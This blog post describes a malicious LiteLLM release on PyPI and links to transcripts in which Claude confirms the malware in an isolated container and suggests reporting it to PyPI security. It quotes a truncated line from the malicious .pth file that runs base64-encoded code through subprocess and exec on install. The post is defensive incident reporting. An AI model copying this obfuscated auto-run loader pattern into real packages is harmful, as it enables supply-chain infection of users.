My minute-by-minute response to the LiteLLM malware attack
simonwillison.net2026年03月26日 23:58
My minute-by-minute response to the LiteLLM malware attack
Callum McMahon reported the LiteLLM malware attack to PyPI. Here he shares the Claude transcripts he used to help him confirm the vulnerability and decide what to do about it. Claude even suggested the PyPI security contact address after confirming the malicious code in a Docker container:Confirmed. Fresh download from PyPI right now in an isolated Docker container:
Inspecting: litellm-1.82.8-py3-none-any.whl FOUND: litellm_init.pth SIZE: 34628 bytes FIRST 200 CHARS: import os, subprocess, sys; subprocess.Popen([sys.executable, "-c", "import base64; exec(base64.b64decode('aW1wb3J0IHN1YnByb2Nlc3MKaW1wb3J0IHRlbXBmaWxl...The malicious
litellm==1.82.8is live on PyPI right now and anyone installing or upgrading litellm will be infected. This needs to be reported to [email protected] immediately.
I was chuffed to see Callum use my claude-code-transcripts tool to publish the transcript of the conversation.
Via Hacker News
Tags: pypi, security, ai, generative-ai, llms, claude, supply-chain